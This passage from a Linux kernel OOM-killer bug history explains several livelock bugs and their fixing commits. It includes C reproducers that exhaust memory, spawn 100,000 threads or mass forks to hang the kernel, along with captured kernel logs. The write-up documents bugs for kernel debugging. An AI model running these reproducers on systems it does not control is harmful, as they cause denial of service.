[   47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB
[   47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.163987] 4649 total pagecache pages
[   47.166121] 0 pages in swap cache
[   47.168500] Swap cache stats: add 0, delete 0, find 0/0
[   47.170238] Free swap  = 0kB
[   47.171764] Total swap = 0kB
[   47.173270] 524157 pages RAM
[   47.174520] 0 pages HighMem/MovableOnly
[   47.175930] 76617 pages reserved
[   47.178043] 0 pages hwpoisoned
[   47.179584] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
[   47.182065] [ 3820]     0  3820    10756      168      24       3        0             0 systemd-journal
[   47.184504] [ 3823]     0  3823    10262      101      23       3        0         -1000 systemd-udevd
[   47.186847] [ 3824]     0  3824    27503       33      12       3        0             0 agetty
[   47.189291] [ 3825]     0  3825     8673       84      23       3        0             0 systemd-logind
[   47.191691] [ 3826]     0  3826    21787      154      48       3        0             0 login
[   47.193959] [ 3828]    81  3828     6609       82      18       3        0          -900 dbus-daemon
[   47.196297] [ 3831]     0  3831    28878       93      15       3        0             0 bash
[   47.198573] [ 3850]     0  3850   541715   414661     820       6        0             0 oom-depleter2
[   47.200915] [ 3851]     0  3851   541715   414661     820       6        0             0 oom-depleter2
[   47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child
[   47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB
[   47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da
[   47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.265184]  0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283
[   47.267511]  00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000
[   47.269815]  ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf
[   47.272019] Call Trace:
[   47.273283]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.275081]  [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150
[   47.276962]  [<ffffffff810a30cf>] ? __wake_up+0x3f/0x50
[   47.278700]  [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930
[   47.280664]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.282422]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.284240]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.286036]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.287693]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.289358] Mem-Info:
[   47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0
[   47.290494]  active_file:0 inactive_file:0 isolated_file:0
[   47.290494]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.290494]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.290494]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.290494]  free:0 free_pcp:180 free_cma:0
[   47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.309430] lowmem_reserve[]: 0 1731 1731 1731
[   47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes
[   47.321601] lowmem_reserve[]: 0 0 0 0
[   47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.331385] 4189 total pagecache pages
[   47.332896] 0 pages in swap cache
[   47.334262] Swap cache stats: add 0, delete 0, find 0/0
[   47.335990] Free swap  = 0kB
[   47.337390] Total swap = 0kB
[   47.338656] 524157 pages RAM
[   47.339964] 0 pages HighMem/MovableOnly
[   47.341464] 76617 pages reserved
[   47.342808] 0 pages hwpoisoned
(...snipped...)
[   93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
---------- Example output end ----------

oom-depleter2 is an exception among the reproducers in that it requires privileges: it reads kernel messages while running with real-time priority. However, the privileges are needed only to control the timing strictly, so an unprivileged user's process could reproduce the problem if the timing happens to match.

In the end, since it turned out to be safe to send the SIGKILL signal between task_lock() and task_unlock(), this bug was fixed by commit 426fb5e72d92b868 ("mm/oom_kill.c: reverse the order of setting TIF_MEMDIE and sending SIGKILL").

September 2015  Preemption delays the OOM killer too much

When asynchronous memory reclaim by kswapd cannot keep up, memory is reclaimed synchronously by direct reclaim. Therefore, when many processes issue memory allocation requests at the same time, they all perform direct reclaim. As a result, especially on kernels built with CONFIG_PREEMPT=y to reduce response latency, the OOM killer, once invoked, cannot complete its work within a realistic time. This bug remains even after the OOM reaper was introduced.

---------- oom_preempt.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>

static cpu_set_t set = { { 1 } }; /* Allow only CPU 0. */
static char filename[32] = { };

/* down_read(&mm->mmap_sem) requester. */
static int reader(void *unused)
{
        const int fd = open(filename, O_RDONLY);
        char buffer[128];
        sched_setaffinity(0, sizeof(set), &set);
        sleep(2);
        while (pread(fd, buffer, sizeof(buffer), 0) > 0);
        while (1)
                pause();
        return 0;
}

/* down_write(&mm->mmap_sem) requester. */
static int writer(void *unused)
{
        const int fd = open("/proc/self/exe", O_RDONLY);
        sleep(2);
        while (1) {
                void *ptr = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
                munmap(ptr, 4096);
        }
        return 0;
}

static void my_clone(int (*func) (void *))
{
        char *stack = malloc(4096);
        if (stack)
                clone(func, stack + 4096,
                      CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL);
}

/* Memory consumer for invoking the OOM killer. */
static void memory_eater(void) {
        char *buf = NULL;
        unsigned long i;
        unsigned long size = 0;
        sleep(4);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        fprintf(stderr, "Start eating memory\n");
        for (i = 0; i < size; i += 4096)
                buf[i] = '\0'; /* Will cause OOM due to overcommit */
}

int main(int argc, char *argv[])
{
        int i;
        const pid_t pid = fork();
        if (pid == 0) {
                for (i = 0; i < 9; i++)
                        my_clone(writer);
                writer(NULL);
                _exit(0);
        } else if (pid > 0) {
                snprintf(filename, sizeof(filename), "/proc/%u/stat", pid);
                for (i = 0; i < 100000; i++)
                        my_clone(reader);
        }
        memory_eater();
        return *(char *) NULL; /* Not reached. */
}
---------- oom_preempt.c ----------
---------- Example output start ----------
[   54.702339] oom_preempt invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[   54.705590] oom_preempt cpuset=/ mems_allowed=0
[   74.525856] CPU: 0 PID: 4436 Comm: oom_preempt Not tainted 4.7.0-rc5 #57
[   74.528056] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   74.530951]  0000000000000286 00000000a8634c59 ffff88007a8ab9f8 ffffffff812c32a7
[   74.533292]  ffff88007a8abbe0 0000000000000000 ffff88007a8aba90 ffffffff81188781
[   74.535723]  ffffffff810fde71 0000000000000001 0000000000000003 ffff88007fffdb10
[   74.538167] Call Trace:
[   74.539653]  [<ffffffff812c32a7>] dump_stack+0x4f/0x68
[   74.541537]  [<ffffffff81188781>] dump_header+0x5b/0x200
[   74.543392]  [<ffffffff810fde71>] ? delayacct_end+0x51/0x60
[   74.545329]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[   74.547618]  [<ffffffff815dce13>] ? _raw_spin_unlock_irqrestore+0x13/0x30
[   74.549894]  [<ffffffff811187d1>] oom_kill_process+0x221/0x420
[   74.551888]  [<ffffffff81117e1b>] ? find_lock_task_mm+0x4b/0x80
[   74.553936]  [<ffffffff81118cad>] out_of_memory+0x28d/0x480
[   74.556059]  [<ffffffff8111d20a>] __alloc_pages_nodemask+0xa5a/0xc20
[   74.558245]  [<ffffffff811143ff>] ? __page_cache_alloc+0xaf/0xc0
[   74.560278]  [<ffffffff81162563>] alloc_pages_current+0x83/0x110
[   74.562319]  [<ffffffff811143ff>] __page_cache_alloc+0xaf/0xc0
[   74.564328]  [<ffffffff81116fda>] filemap_fault+0x27a/0x500
[   74.566237]  [<ffffffff81246859>] xfs_filemap_fault+0x39/0x60
[   74.568308]  [<ffffffff8113d58e>] __do_fault+0x6e/0xf0
[   74.570182]  [<ffffffff8114236c>] handle_mm_fault+0x163c/0x2280
[   74.572131]  [<ffffffff815d8fc9>] ? __schedule+0x1c9/0x590
[   74.574015]  [<ffffffff810497bd>] __do_page_fault+0x19d/0x510
[   74.575898]  [<ffffffff81049b51>] do_page_fault+0x21/0x70
[   74.577656]  [<ffffffff8100259d>] ? do_syscall_64+0xed/0xf0
[   74.579503]  [<ffffffff815de9b2>] page_fault+0x22/0x30
[  240.447847] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  240.450075]       Not tainted 4.7.0-rc5 #57
[  240.451571] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  240.453723] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  240.455892]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  240.458302]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  240.460546]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  240.462840] Call Trace:
[  240.463963]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  240.465586]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  240.467430]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  240.469236]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  240.470843]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  240.472730]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  240.476670]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  240.478486]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  240.480660]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  240.482313]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  240.484137]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  240.485837]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  240.487417]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
[  240.489090]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
[  299.096125] Mem-Info:
[  299.097266] active_anon:392824 inactive_anon:2094 isolated_anon:0
[  299.097266]  active_file:0 inactive_file:0 isolated_file:0
[  299.097266]  unevictable:0 dirty:0 writeback:0 unstable:0
[  299.097266]  slab_reclaimable:1744 slab_unreclaimable:10750
[  299.097266]  mapped:369 shmem:2160 pagetables:2098 bounce:0
[  299.097266]  free:12955 free_pcp:159 free_cma:0
[  341.098578] Node 0 DMA free:7260kB min:404kB low:504kB high:604kB active_anon:6708kB inactive_anon:108kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:108kB slab_reclaimable:20kB slab_unreclaimable:408kB kernel_stack:688kB pagetables:432kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:20 all_unreclaimable? yes
[  360.494674] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  360.494675]       Not tainted 4.7.0-rc5 #57
[  360.494676] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  360.494678] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  360.494680]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  360.494681]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  360.494682]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  360.494683] Call Trace:
[  360.494689]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  360.494690]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  360.494691]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  360.494693]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  360.494695]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  360.494697]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  360.494698]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  360.494700]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  360.494701]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  360.494703]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  360.494705]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  360.494706]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  360.494708]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
[  360.494709]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
[  391.435178] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 86s!
[  391.435180] Showing busy workqueues and worker pools:
[  391.435181] workqueue events: flags=0x0
[  391.435186]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  391.435196]     pending: vmpressure_work_fn, vmstat_shepherd
[  391.435200] workqueue events_freezable_power_: flags=0x84
[  391.435201]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  391.435205]     in-flight: 30:disk_events_workfn
[  391.435226] workqueue xfs-eofblocks/sda1: flags=0xc
[  391.435227]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  391.435231]     in-flight: 72:xfs_eofblocks_worker
[  391.435234] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  391.435236] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=86s workers=2 manager: 77
[  421.515615] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 116s!
[  421.515617] Showing busy workqueues and worker pools:
[  421.515618] workqueue events: flags=0x0
[  421.515620]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  421.515627]     pending: vmpressure_work_fn, vmstat_shepherd
[  421.515631] workqueue events_power_efficient: flags=0x80
[  421.515633]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  421.515636]     pending: check_lifetime
[  421.515637] workqueue events_freezable_power_: flags=0x84
[  421.515638]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  421.515641]     in-flight: 30:disk_events_workfn
[  421.515657] workqueue xfs-eofblocks/sda1: flags=0xc
[  421.515659]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  421.515662]     in-flight: 72:xfs_eofblocks_worker
[  421.515666] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  421.515667] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=116s workers=2 manager: 77
[  451.596127] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 146s!
[  451.596129] Showing busy workqueues and worker pools:
[  451.596130] workqueue events: flags=0x0
[  451.596151]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  451.596158]     pending: vmpressure_work_fn, vmstat_shepherd
[  451.596162] workqueue events_power_efficient: flags=0x80
[  451.596163]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  451.596166]     pending: check_lifetime
[  451.596167] workqueue events_freezable_power_: flags=0x84
[  451.596168]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  451.596172]     in-flight: 30:disk_events_workfn
[  451.596187] workqueue xfs-eofblocks/sda1: flags=0xc
[  451.596188]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  451.596191]     in-flight: 72:xfs_eofblocks_worker
[  451.596194] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  451.596196] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=146s workers=2 manager: 77
[  480.496878] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  480.496879]       Not tainted 4.7.0-rc5 #57
[  480.496880] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  480.496883] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  480.496885]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  480.496886]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  480.496887]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  480.496888] Call Trace:
[  480.496893]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  480.496895]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  480.496896]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  480.496897]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  480.496900]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  480.496904]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  480.496905]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  480.496907]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  480.496908]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  480.496911]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  480.496912]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  480.496915]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  480.496917]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
[  480.496918]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
(Notice that the "Out of memory: Kill process" line has still not been printed even though 7 minutes have elapsed since the "invoked oom-killer:" line was printed.)
---------- Example output end ----------

October 2015  The OOM killer cannot be invoked due to vmstat_update work not executed

Allocating and releasing memory are very frequent operations. Also, Linux is designed to run on systems with anywhere from one CPU to thousands of CPUs. If memory usage (vmstat) were tracked in global variables updated under exclusion control, it would cause a significant performance penalty. Therefore, to avoid that performance problem, memory usage is maintained on a per-CPU basis and synchronized periodically or as needed. For the periodic synchronization, a vmstat_update work request is queued to the system_wq workqueue.

But while the system_wq workqueue is processing some other work request, it cannot process the vmstat_update work request. As a result, when a work request is doing memory allocation, memory usage is never updated because the vmstat_update work request cannot be processed, while the in-flight allocation request keeps seeing outdated memory usage and retries forever due to the "too small to fail" memory-allocation rule. The system thus enters an infinite loop without being able to invoke the OOM killer.

---------- Example output start ----------
[  271.579276] MemAlloc: kworker/0:56(7399) gfp=0x2400000 order=0 delay=129294
[  271.581237]  ffff88007c78fa08 ffff8800778f8c80 ffff88007c790000 ffff8800778f8c80
[  271.583329]  0000000002400000 0000000000000000 ffff8800778f8c80 ffff88007c78fa20
[  271.585391]  ffffffff8162aa9d 0000000000000001 ffff88007c78fa30 ffffffff8162aac7
[  271.587463] Call Trace:
[  271.588512]  [<ffffffff8162aa9d>] preempt_schedule_common+0x18/0x2b
[  271.590243]  [<ffffffff8162aac7>] _cond_resched+0x17/0x20
[  271.591830]  [<ffffffff8111fafe>] __alloc_pages_nodemask+0x64e/0xcc0
[  271.593561]  [<ffffffff8116a3b2>] ? __kmalloc+0x22/0x190
[  271.595119]  [<ffffffff81160ce7>] alloc_pages_current+0x87/0x110
[  271.596778]  [<ffffffff812e95f4>] bio_copy_kern+0xc4/0x180
[  271.598342]  [<ffffffff810a6a00>] ? wait_woken+0x80/0x80
[  271.599878]  [<ffffffff812f25f0>] blk_rq_map_kern+0x70/0x130
[  271.601481]  [<ffffffff812ece35>] ? blk_get_request+0x75/0xe0
[  271.603100]  [<ffffffff814433fd>] scsi_execute+0x12d/0x160
[  271.604657]  [<ffffffff81443524>] scsi_execute_req_flags+0x84/0xf0
[  271.606339]  [<ffffffffa01db742>] sr_check_events+0xb2/0x2a0 [sr_mod]
[  271.608141]  [<ffffffff8109cbfc>] ? set_next_entity+0x6c/0x6a0
[  271.609830]  [<ffffffffa01cf163>] cdrom_check_events+0x13/0x30 [cdrom]
[  271.611610]  [<ffffffffa01dbb85>] sr_block_check_events+0x25/0x30 [sr_mod]
[  271.613429]  [<ffffffff812fc7eb>] disk_check_events+0x5b/0x150
[  271.615065]  [<ffffffff812fc8f1>] disk_events_workfn+0x11/0x20
[  271.616699]  [<ffffffff810827c5>] process_one_work+0x135/0x310
[  271.618321]  [<ffffffff81082abb>] worker_thread+0x11b/0x4a0
[  271.620018]  [<ffffffff810829a0>] ? process_one_work+0x310/0x310
[  271.622022]  [<ffffffff81087e53>] kthread+0xd3/0xf0
[  271.623533]  [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0
[  271.625487]  [<ffffffff8162f09f>] ret_from_fork+0x3f/0x70
[  271.627175]  [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0
---------- Example output end ----------

The output above, produced by kmallocwd, reports that a workqueue worker issuing a GFP_NOIO memory allocation request has been retrying for 129 seconds so far. Judging from my experience of reproducing various OOM livelock situations, the system is presumably already in an OOM livelock if the disk_events_workfn() function keeps calling the __alloc_pages_nodemask() function and waiting for help that is unlikely to come. (The reason I wrote "A drive recognized as /dev/sr0" in Target environments is that the management task for the CD-ROM drive periodically issues GFP_NOIO memory allocation requests, so that we can obtain traces like the one shown above.)

This situation has a cause similar to that of being unable to invoke the OOM killer using SysRq-f. It is difficult to imagine what happens when all the workqueues, which work like handymen, become busy. If each work item were assigned a dedicated workqueue, we could avoid the "never processed" problem, but at the cost of wasting resources.

Since we could not leave this problem unresolved, a dedicated workqueue was assigned to the vmstat work item. Specifically, commit 373ccbe5927034b5 ("mm, vmstat: allow WQ concurrency to discover memory reclaim doesn't make any progress"), commit 751e5f5c753e8d44 ("vmstat: allocate vmstat_wq before it is used") and commit 564e81a57f9788b1 ("mm, vmstat: fix wrong WQ sleep when memory reclaim doesn't make any progress") were applied. Note that this problem affects RHEL 6/7.

December 2015  Feedback in OOM detection rework was too optimistic

This is a problem which was discovered at the same time as the abovementioned vmstat_update problem. In order to avoid OOM livelock situations, the judgement of whether to retry an allocation request before invoking the OOM killer was made stricter in stages. While testing the modification, it turned out that the OOM killer was trivially and prematurely invoked, even without memory pressure, simply by repeating file I/O.

---------- fileio2.c ----------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        static char buffer[4096];
        signal(SIGCHLD, SIG_IGN);
        for (i = 0; i < 2; i++) {
                int fd;
                int j;
                snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                fd = open(buffer, O_RDWR | O_CREAT, 0600);
                memset(buffer, 0, sizeof(buffer));
                for (j = 0; j < 1048576 * 1000 / 4096; j++) /* 1000 is MemTotal / 2 */
                        write(fd, buffer, sizeof(buffer));
                close(fd);
        }
        for (i = 0; i < 2; i++) {
                if (fork() == 0) {
                        int fd;
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                        fd = open(buffer, O_RDWR);
                        memset(buffer, 0, sizeof(buffer));
                        while (fd != EOF) {
                                lseek(fd, 0, SEEK_SET);
                                while (read(fd, buffer, sizeof(buffer)) == sizeof(buffer));
                        }
                        _exit(0);
                }
        }
        if (fork() == 0) {
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        if (fork() == 0) {
                sleep(1);
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        while (1)
                system("pidof fork | wc");
        return 0;
}
---------- fileio2.c ----------
---------- fork.c ----------
#include <unistd.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        signal(SIGCHLD, SIG_IGN);
        while (1) {
                sleep(5);
                for (i = 0; i < 2000; i++) {
                        if (fork() == 0) {
                                sleep(3);
                                _exit(0);
                        }
                }
        }
}
---------- fork.c ----------
---------- Example output start ----------
[  277.863985] Node 0 DMA32 free:20128kB min:5564kB low:6952kB high:8344kB active_anon:108332kB inactive_anon:8252kB active_file:985160kB inactive_file:615436kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5904kB shmem:8524kB slab_reclaimable:52088kB slab_unreclaimable:59748kB kernel_stack:31280kB pagetables:55708kB unstable:0kB bounce:0kB free_pcp:1056kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  277.884512] Node 0 DMA32: 3438*4kB (UME) 791*8kB (UME) 3*16kB (UM) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20128kB
[  291.331040] Node 0 DMA32 free:29500kB min:5564kB low:6952kB high:8344kB active_anon:126756kB inactive_anon:8252kB active_file:821500kB inactive_file:604016kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:12684kB shmem:8524kB slab_reclaimable:56808kB slab_unreclaimable:99804kB kernel_stack:58448kB pagetables:92552kB unstable:0kB bounce:0kB free_pcp:2004kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  291.349097] Node 0 DMA32: 4221*4kB (UME) 1971*8kB (UME) 436*16kB (UME) 141*32kB (UME) 8*64kB (UM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44652kB
[  302.897985] Node 0 DMA32 free:28240kB min:5564kB low:6952kB high:8344kB active_anon:79344kB inactive_anon:8248kB active_file:1016568kB inactive_file:604696kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:80kB writeback:0kB mapped:13004kB shmem:8520kB slab_reclaimable:52076kB slab_unreclaimable:64064kB kernel_stack:35168kB pagetables:48552kB unstable:0kB bounce:0kB free_pcp:1384kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  302.916334] Node 0 DMA32: 4304*4kB (UM) 1181*8kB (UME) 59*16kB (UME) 7*32kB (ME) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 27832kB
[  311.014501] Node 0 DMA32 free:22820kB min:5564kB low:6952kB high:8344kB active_anon:56852kB inactive_anon:11976kB active_file:1142936kB inactive_file:582040kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:160kB writeback:0kB mapped:10796kB shmem:16640kB slab_reclaimable:48608kB slab_unreclaimable:41912kB kernel_stack:16560kB pagetables:30876kB unstable:0kB bounce:0kB free_pcp:948kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:128 all_unreclaimable? no
[  311.034251] Node 0 DMA32: 6*4kB (U) 2401*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 19232kB
